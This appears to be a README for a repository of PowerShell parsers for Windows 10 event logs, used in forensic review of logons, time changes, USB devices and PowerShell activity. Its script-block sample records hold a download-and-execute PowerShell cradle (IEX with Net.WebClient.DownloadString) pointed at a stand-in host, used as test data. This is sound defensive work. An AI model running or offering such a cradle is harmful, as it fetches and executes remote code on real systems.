- keywords1 - Powershell script to list all eventlog keywords and the resulting list (from Win10 Pro version 1803)
- keywords2 - Powershell script to list all event specific generated keywords and sample list (from the Win10 Pro version 1803 "Microsoft-Windows-PushNotifications-Platform" event provider)
- OpCodes - PowerShell script to list all OpCodes, their Name & DisplayName for all event providers, and 2 csv lists
- 'Task Categories' - PowerShell script to list all Task Categories, their Name & DisplayName for all event providers. Full csv list here.
-
Win 10 Microsoft-Windows-Partition/Diagnostic EventID: 1006 parser - PowerShell script to read a live or offline Microsoft-Windows-Partition/Diagnostic.evtx log and list all the EventID: 1006 entries in a window. Selected rows are saved in a comma separated file (csv). This log has 71 fields with diagnostic information for all storage devices (including USB and virtual drives such as vhd/vhdx, or images mounted with Arsenal Image Mounter), among them the raw MBR or VBR bytes of the device:
VBR0 entry (size & bytes) of a USB stick:
VBR above saved & opened with Active Disk Editor
Mbr log entry (copy/pasted to HxD)
GPT Partition table entry of same drive in Active Disk Editor
-
Win 10 Microsoft-Windows-Kernel-PnP parser - PowerShell script to read a live or offline Microsoft-Windows-Kernel-PnP/Configuration.evtx log and list all the entries. Should also work from Win7 onwards.
-
Win 10 Microsoft-Windows-PowerShell parser - PowerShell script to read a live or offline Microsoft-Windows-PowerShell/Operational.evtx log and list all the entries. Should also work from Win7 onwards. Note that with default settings this log does not record which scripts were run, only console start-ups (and, for the ISE, the name of the script it started); the content of executed script blocks is only written to this log (Event ID 4104) once PowerShell Script Block Logging has been enabled by policy (the EnableScriptBlockLogging policy value).
- Event ID: 40961 - PowerShell console is starting up
- Event ID: 40962 - PowerShell console is ready for user input
- Event ID: 40962 - Windows PowerShell ISE has started to run script XXX
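Since script block content does land in this log once Script Block Logging is on, here is an added example (written for this page, not one of the repo's scripts) that reads the 4104 events and stitches multi-part script blocks back together by ScriptBlockId. It assumes Get-WinEvent-shaped records (.Id, .TimeCreated, .RecordId, .Properties) and that the 4104 property order is MessageNumber, MessageTotal, ScriptBlockText, ScriptBlockId, Path, as the event template lists them; the sample records are constructed, and the policy check reads the standard EnableScriptBlockLogging value.

```powershell
# Added example for this page (not one of the repo's scripts).
# Reassembles script block logging events (4104) from Microsoft-Windows-PowerShell/Operational.

function Test-ScriptBlockLogging {
    # Policy value that turns script block logging on; absent or 0 means off.
    $key = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging'
    $v = (Get-ItemProperty -Path $key -Name EnableScriptBlockLogging -ErrorAction SilentlyContinue).EnableScriptBlockLogging
    return ($v -eq 1)
}

function Get-ScriptBlocks {
    # Input: Get-WinEvent records (.Id, .TimeCreated, .RecordId, .Properties).
    # 4104 property order per the event template (assumed here):
    #   [0] MessageNumber [1] MessageTotal [2] ScriptBlockText [3] ScriptBlockId [4] Path
    param([Parameter(ValueFromPipeline)] $Event)
    begin { $parts = @{} }
    process {
        if ($Event.Id -ne 4104) { return }
        $p  = $Event.Properties
        $id = [string]$p[3].Value
        if (-not $parts.ContainsKey($id)) { $parts[$id] = @() }
        $parts[$id] += [pscustomobject]@{
            Number = [int]$p[0].Value; Total = [int]$p[1].Value
            Text   = [string]$p[2].Value; Path = [string]$p[4].Value
            TimeCreated = $Event.TimeCreated; RecordId = $Event.RecordId
        }
    }
    end {
        foreach ($id in $parts.Keys) {
            $chunks = @($parts[$id] | Sort-Object Number)
            $total  = $chunks[0].Total
            [pscustomobject]@{
                ScriptBlockId   = $id
                FirstSeen       = @($chunks | Sort-Object TimeCreated)[0].TimeCreated
                Path            = @($chunks | Where-Object { $_.Path })[0].Path   # empty for interactive input
                Complete        = ($chunks.Count -eq $total)   # False if a part is missing (log rolled over)
                Parts           = '{0}/{1}' -f $chunks.Count, $total
                ScriptBlockText = ($chunks.Text -join '')
            }
        }
    }
}

# Constructed sample records (not real log extracts): one script block logged in two parts, plus a 4103.
function New-SampleEvent($Id, $Time, $RecordId, [object[]]$Values) {
    [pscustomobject]@{
        Id = $Id; TimeCreated = [datetime]$Time; RecordId = $RecordId
        Properties = @($Values | ForEach-Object { [pscustomobject]@{ Value = $_ } })
    }
}
$blockId = '3b1f2c0e-5c2d-4e3f-9a7b-0123456789ab'
$sample = @(
    (New-SampleEvent 4104 '2018-07-01T10:00:00Z' 10 @(1, 2, 'IEX (New-Object Net.WebClient)', $blockId, 'C:\Users\u\run.ps1'))
    (New-SampleEvent 4104 '2018-07-01T10:00:01Z' 11 @(2, 2, ".DownloadString('http://example.invalid/p')", $blockId, 'C:\Users\u\run.ps1'))
    (New-SampleEvent 4103 '2018-07-01T10:00:02Z' 12 @('module logging record, ignored here'))
)
"Script block logging enabled by policy: $(Test-ScriptBlockLogging)"
$sample | Get-ScriptBlocks | Format-List

# Live or offline use (record order does not matter here; parts are sorted by MessageNumber):
# Get-WinEvent -FilterHashtable @{LogName='Microsoft-Windows-PowerShell/Operational'; Id=4104} | Get-ScriptBlocks
# Get-WinEvent -FilterHashtable @{Path='C:\evidence\Microsoft-Windows-PowerShell%4Operational.evtx'; Id=4104} |
#     Get-ScriptBlocks | Export-Csv scriptblocks.csv -NoTypeInformation
```

The Complete flag is the check worth keeping an eye on: a long script block is split across several 4104 records, and if the log has rolled over in between you get only the tail of it.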
-
Win 10 Microsoft-Windows-VolumeSnapshot-Driver parser - PowerShell script to read a live or offline Microsoft-Windows-VolumeSnapshot-Driver/Operational.evtx log and list all the entries. Should also work from Win7 onwards. (Exploring Volume Shadow (VSS) snapshots (pdf))
- Win 10 Microsoft-Windows-VHDMP-Operational parser - PowerShell script to read a live or offline Microsoft-Windows-VHDMP-Operational.evtx log and list all the entries. (Supports Event IDs: 1,2,50,51)
- Win 10 Security EventID: 4688 parser - PowerShell script to read a live or offline security.evtx log and list all the EventID: 4688 entries (A new process has been created).
- Win 10 Security EventID: 4624/4634/4647 parser - PowerShell script to read a live or offline security.evtx log and list all the EventID: 4624 (An account was successfully logged on), EventID: 4634 (An account was logged off) and EventID: 4647 (User initiated logoff) entries in a window.
- Win 10 Security EventID: 4634/4647 parser - PowerShell script to read a live or offline security.evtx log and list all the EventID: 4634 (An account was logged off) and EventID: 4647 (User initiated logoff) entries in a window. The main difference between "4647: User initiated logoff" and 4634 is that 4647 is generated when the logoff procedure was initiated by a specific account using the logoff function, whereas 4634 shows that the session was terminated and no longer exists.
- Win 10 Security EventID: 4624 parser - PowerShell script to read a live or offline security.evtx log and list all the EventID: 4624 entries (An account was successfully logged on) in a window.
- Win 10 Security EventID: 4648 parser - PowerShell script to read a live or offline security.evtx log and list all the EventID: 4648 entries (A logon was attempted using explicit credentials) in a window.
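The 4624 / 4634 / 4647 relationship is easiest to see when the events are paired per logon session. The following is an added example, not the repo's parser: it keys on TargetLogonId, records a 4647 as the moment the user asked to log off and the 4634 as the moment the session actually ended, and assumes the template property order for those three events (indices noted in the comments) and oldest-first input. The sample records are constructed.

```powershell
# Added example for this page (not one of the repo's scripts).
# Pairs 4624 logons with the 4634/4647 that close the same session, keyed on TargetLogonId.
# Property indices follow each event's template (Get-WinEvent -ListProvider ... shows them):
#   4624: [5] TargetUserName [6] TargetDomainName [7] TargetLogonId [8] LogonType
#   4634: [1] TargetUserName [2] TargetDomainName [3] TargetLogonId [4] LogonType
#   4647: [1] TargetUserName [2] TargetDomainName [3] TargetLogonId

function Get-LogonSessions {
    param([Parameter(ValueFromPipeline)] $Event)   # feed events oldest first
    begin { $sessions = [ordered]@{} }
    process {
        $p = $Event.Properties
        switch ($Event.Id) {
            4624 {
                # LogonId is unique per boot; in a log spanning reboots a later logon with the same id replaces the earlier entry
                $id = '0x{0:x}' -f [uint64]$p[7].Value
                $sessions[$id] = [ordered]@{
                    LogonId = $id; User = '{0}\{1}' -f $p[6].Value, $p[5].Value
                    LogonType = [int]$p[8].Value; LogonTime = $Event.TimeCreated
                    LogoffRequested = $null; SessionEnd = $null; Duration = $null
                }
            }
            { $_ -eq 4634 -or $_ -eq 4647 } {
                $id = '0x{0:x}' -f [uint64]$p[3].Value
                if (-not $sessions.Contains($id)) {
                    # logoff whose logon is not in this log (older than the log, or rolled off)
                    $sessions[$id] = [ordered]@{
                        LogonId = $id; User = '{0}\{1}' -f $p[2].Value, $p[1].Value
                        LogonType = $null; LogonTime = $null
                        LogoffRequested = $null; SessionEnd = $null; Duration = $null
                    }
                }
                $s = $sessions[$id]
                if ($Event.Id -eq 4647) {
                    $s.LogoffRequested = $Event.TimeCreated      # user initiated the logoff
                } else {
                    $s.SessionEnd = $Event.TimeCreated           # session terminated, no longer exists
                    if ($s.LogonTime) { $s.Duration = $s.SessionEnd - $s.LogonTime }
                }
            }
        }
    }
    end { foreach ($s in $sessions.Values) { [pscustomobject]$s } }   # sessions with no SessionEnd are still open
}

# Constructed sample records (not real log extracts), oldest first.
function New-SampleEvent($Id, $Time, [object[]]$Values) {
    [pscustomobject]@{ Id = $Id; TimeCreated = [datetime]$Time
        Properties = @($Values | ForEach-Object { [pscustomobject]@{ Value = $_ } }) }
}
$sample = @(
    # 4624 carries many more properties; only indices 0-8 are needed here.
    (New-SampleEvent 4624 '2018-07-01T08:00:00Z' @('S-1-5-18', 'WIN10$', 'WORKGROUP', 999, 'S-1-5-21-1-2-3-1001', 'alice', 'WIN10', 0x1a2b3, 2))
    (New-SampleEvent 4624 '2018-07-01T08:05:00Z' @('S-1-0-0', '-', '-', 0, 'S-1-5-21-1-2-3-1002', 'svc_backup', 'WIN10', 0x1b000, 3))
    (New-SampleEvent 4634 '2018-07-01T08:05:07Z' @('S-1-5-21-1-2-3-1002', 'svc_backup', 'WIN10', 0x1b000, 3))
    (New-SampleEvent 4647 '2018-07-01T17:30:00Z' @('S-1-5-21-1-2-3-1001', 'alice', 'WIN10', 0x1a2b3))
    (New-SampleEvent 4634 '2018-07-01T17:30:04Z' @('S-1-5-21-1-2-3-1001', 'alice', 'WIN10', 0x1a2b3, 2))
)
$sample | Get-LogonSessions | Format-Table LogonId, User, LogonType, LogonTime, LogoffRequested, SessionEnd, Duration

# Live or offline use; -Oldest matters because the pairing relies on chronological order:
# Get-WinEvent -FilterHashtable @{LogName='Security'; Id=4624,4634,4647} -Oldest | Get-LogonSessions
# Get-WinEvent -FilterHashtable @{Path='C:\evidence\Security.evtx'; Id=4624,4634,4647} -Oldest |
#     Get-LogonSessions | Export-Csv sessions.csv -NoTypeInformation
```

In the sample the network logon (type 3) ends with a bare 4634 seven seconds later, while the interactive one gets a 4647 first and the 4634 four seconds after it; the gap between LogoffRequested and SessionEnd is exactly the difference the list entry above describes.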
- Win 10/11 System.evtx EventIDs: 1,12,13,20,24,238 'Microsoft-Windows-Kernel (General & Boot)' parser - PowerShell script to list Windows Start-Up/Shutdown & Time change events.
-
-
Win 10 Security EventID: 4616 & System EventID: 1 parser - PowerShell script to read both security.evtx and system.evtx logs from a live or offline Win 10 PC, and list all the EventID:1 and EventID: 4616 entries (The system time was changed) in a window. Selected rows are saved in a comma separated file (csv).
The script needs to be executed from an Administrator console (the live Security log is only readable with administrative rights).
- Event Providers (type the following in a PowerShell prompt to see the event template):
-
"Microsoft-Windows-Kernel-General" (ID: 1)
```powershell
(Get-WinEvent -ListProvider "Microsoft-Windows-Kernel-General").Events | Where-Object {$_.Id -eq 1}
```
- Change Reason values (Nr#) logged by this event:
1 = An application or system component changed the time
2 = System time synchronized with the hardware clock
3 = System time adjusted to the new time zone
-
Event Provider Task Descriptions:
```powershell
(Get-WinEvent -ListProvider 'Microsoft-Windows-Kernel-General' -ErrorAction SilentlyContinue).Tasks
```
Example of the above:
-
"Microsoft-Windows-Security-Auditing" (ID: 4616)
```powershell
(Get-WinEvent -ListProvider "Microsoft-Windows-Security-Auditing").Events | Where-Object {$_.Id -eq 4616}
```
-
- Win 10 Microsoft-Windows-Winlogon parser - PowerShell script to read a live or offline Microsoft-Windows-Winlogon/Operational.evtx log and list all the relevant entries in a window.
-
Win 10 Security EventID: 4616 parser - PowerShell script to read a live or offline security.evtx log and list all the EventID: 4616 entries (The system time was changed) in a window. Selected rows are saved in a comma separated file (csv).
The script (needs to be executed from an Administrator console) will parse the following information for any 4616 event:
-
| Field | Description |
|---|---|
| Time Created | DateTime the event was recorded |
| EventID | Record ID of the event |
| PID | Process ID |
| ThreadID | Thread ID |
| User Name | User name associated with the event |
| SID | Security identifier (SID) of that user |
| Domain Name | Domain name |
| New Time | New time |
| Previous Time | Previous time |
| Change | Difference between New and Previous times |
| Process Name | The process that initiated the time change |
-
- `tzutil /l` : List time zones
-
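As an added example (not the repo's script) of building that column layout from the raw event XML, the function below handles both the Security 4616 event and the Microsoft-Windows-Kernel-General ID 1 event from the System log, so it serves the combined 4616 & System ID 1 parser described earlier as well. It assumes the event data field names shown by the -ListProvider templates (PreviousTime/NewTime and SubjectUser* for 4616; OldTime/NewTime/Reason for Kernel-General 1) and that Get-WinEvent records expose ToXml(); the two sample events are constructed, not taken from a real log.

```powershell
# Added example for this page (not one of the repo's scripts).
# Parses time-change events (Security 4616 and Kernel-General 1) from event XML into one row layout.

function ConvertTo-UtcTime([string]$s) {
    if (-not $s) { return $null }
    $s = $s -replace '(\.\d{7})\d+', '$1'     # the log writes 9 fractional digits; DateTime keeps 7
    [datetime]::Parse($s, [cultureinfo]::InvariantCulture,
                      [System.Globalization.DateTimeStyles]::AdjustToUniversal)
}

function ConvertFrom-TimeChangeEvent {
    param([Parameter(ValueFromPipeline)] $Event)    # EventLogRecord from Get-WinEvent, or an [xml] event
    process {
        $x   = if ($Event -is [xml]) { $Event } else { [xml]$Event.ToXml() }
        $sys = $x.Event.System
        $eid = $sys.EventID
        if ($eid -is [System.Xml.XmlElement]) { $eid = $eid.InnerText }   # EventID carries a Qualifiers attribute in some logs
        # EventData/Data elements are keyed by their Name attribute (GetAttribute avoids XmlNode.Name)
        $d = @{}
        foreach ($item in $x.Event.EventData.Data) {
            if ($item -is [System.Xml.XmlElement]) { $d[$item.GetAttribute('Name')] = $item.InnerText }
        }
        # 4616 uses PreviousTime/NewTime; Kernel-General ID 1 uses OldTime/NewTime and adds Reason (assumed field names)
        $prevRaw = if ($d.ContainsKey('PreviousTime')) { $d.PreviousTime } else { $d.OldTime }
        $prev = ConvertTo-UtcTime $prevRaw
        $new  = ConvertTo-UtcTime $d.NewTime
        [pscustomobject]@{
            TimeCreated  = ConvertTo-UtcTime $sys.TimeCreated.SystemTime
            Log          = $sys.Channel
            EventID      = [int]$eid
            RecordID     = [long]$sys.EventRecordID
            PID          = [int]$sys.Execution.ProcessID
            ThreadID     = [int]$sys.Execution.ThreadID
            UserName     = $d.SubjectUserName
            SID          = if ($d.SubjectUserSid) { $d.SubjectUserSid } else { $sys.Security.UserID }
            Domain       = $d.SubjectDomainName
            NewTime      = $new
            PreviousTime = $prev
            Change       = if ($new -and $prev) { $new - $prev } else { $null }
            Reason       = $d.Reason          # Kernel-General only; codes as listed above
            ProcessName  = $d.ProcessName     # 4616 only
        }
    }
}

# Constructed sample events (not real log extracts): a 4616 and the matching Kernel-General 1.
$sample = @'
<Events>
 <Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System><Provider Name="Microsoft-Windows-Security-Auditing"/><EventID>4616</EventID>
   <TimeCreated SystemTime="2018-07-01T10:00:05.123456700Z"/><EventRecordID>5210</EventRecordID>
   <Execution ProcessID="4" ThreadID="120"/><Channel>Security</Channel><Computer>WIN10</Computer><Security/></System>
  <EventData><Data Name="SubjectUserSid">S-1-5-21-1-2-3-1001</Data><Data Name="SubjectUserName">alice</Data>
   <Data Name="SubjectDomainName">WIN10</Data><Data Name="SubjectLogonId">0x1a2b3</Data>
   <Data Name="PreviousTime">2018-07-01T10:00:05.123456700Z</Data><Data Name="NewTime">2018-07-01T12:00:00.000000000Z</Data>
   <Data Name="ProcessId">0x9c4</Data><Data Name="ProcessName">C:\Windows\System32\rundll32.exe</Data></EventData>
 </Event>
 <Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System><Provider Name="Microsoft-Windows-Kernel-General"/><EventID>1</EventID>
   <TimeCreated SystemTime="2018-07-01T12:00:00.000000000Z"/><EventRecordID>881</EventRecordID>
   <Execution ProcessID="4" ThreadID="8"/><Channel>System</Channel><Computer>WIN10</Computer><Security UserID="S-1-5-18"/></System>
  <EventData><Data Name="NewTime">2018-07-01T12:00:00.000000000Z</Data><Data Name="OldTime">2018-07-01T10:00:05.123456700Z</Data>
   <Data Name="Reason">1</Data></EventData>
 </Event>
</Events>
'@
$events = ([xml]$sample).Events.Event | ForEach-Object {
    $doc = New-Object System.Xml.XmlDocument; $doc.LoadXml($_.OuterXml); $doc   # one [xml] document per <Event>
}
$events | ConvertFrom-TimeChangeEvent | Format-List

# Live or offline use (Security requires an Administrator console):
# Get-WinEvent -FilterHashtable @{LogName='Security'; Id=4616} | ConvertFrom-TimeChangeEvent
# Get-WinEvent -FilterHashtable @{Path='C:\evidence\System.evtx'; ProviderName='Microsoft-Windows-Kernel-General'; Id=1} |
#     ConvertFrom-TimeChangeEvent | Export-Csv timechanges.csv -NoTypeInformation
```

Both sample rows come out with a Change of 1:59:54.877, and the two records share their NewTime, which is the quick cross-check between the Security and System views of one clock change: a 4616 whose jump has no Kernel-General counterpart (or the reverse) means one of the two logs has been cleared or has rolled over.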
Finding Advanced Attacks and Malware With Only 6 Windows EventID’s (pdf)
-
Windows Security Audit Events with message schema spreadsheet from Microsoft.
Note: many pre-Vista (Windows 2000/XP/2003) Security event IDs map to their current IDs by adding 4096 to the old Event ID,
eg: 528 (Successful Logon) + 4096 = 4624. This holds for most audit events that were carried over, not for every ID.
- To Do:
- [X] [List all event log *'keywords'*](keywords.md)
- [X] [List all eventlog-generated *'keywords'*](keywords2.md)
- [X] List all [OpCodes](OpCodes.md)
- [X] List all [Task Categories](https://github.com/kacos2000/Win10/blob/master/EventLogs/Listprovider_Task_Categories.csv)
- [X] Parse EventID 4616
- [X] Parse EventID 4624/4634/4647 together
- [X] Parse EventIDs 4624/4528/4540 (Audit Logon = Success & Failure)
- [X] Parse EventIDs 4634/4647 (An account was logged off/User initiated logoff)
- [X] Parse Microsoft-Windows-Winlogon/Operational.evtx
- [X] Check / Parse EventID 4625
- [X] Check / Parse EventID 4648
- [ ] Check / Parse EventIDs 4663/4657 (Audit File System = Success, (Audit Registry = Success ))
- [ ] Check / Parse EventID 4675
- [X] Check / Parse EventID 4688 (Audit Process Creation = Success)
- [ ] Check / Parse EventID [4720](https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4720): A user account was created
- [ ] Check / Parse EventID [4726](https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4726): A user account was deleted
- [ ] Check / Parse EventIDs 5140/5560 (Audit File Share = Success )
- [ ] Check / Parse EventID 5156 (Audit Filtering Platform Connection = Success)
- [ ] Check / Parse EventIDs 7045/7040
- [ ] ~~Correlate entries in EventIDs 4616, 4624, 4688 etc~~
- [X] [Parse EventLog Microsoft-Windows-PushNotification-Platform/Operational.evtx](https://github.com/kacos2000/Win10/blob/master/Notifications/wpn.ps1)
- [X] Parse Microsoft-Windows-Kernel-PnP/Configuration.evtx
- [X] Parse Microsoft-Windows-VolumeSnapshot-Driver/Operational.evtx
- [X] Parse Microsoft-Windows-VHDMP-Operational.evtx
- [X] Parse Microsoft-Windows-PowerShell/Operational.evtx
- [X] Check /Parse EventID 1006 of Microsoft-Windows-Partition/Diagnostic.evtx [(USB Device Tracking ..)](https://df-stream.com/2018/07/partition-diagnostic-event-log-and-usb-device-tracking-p2/)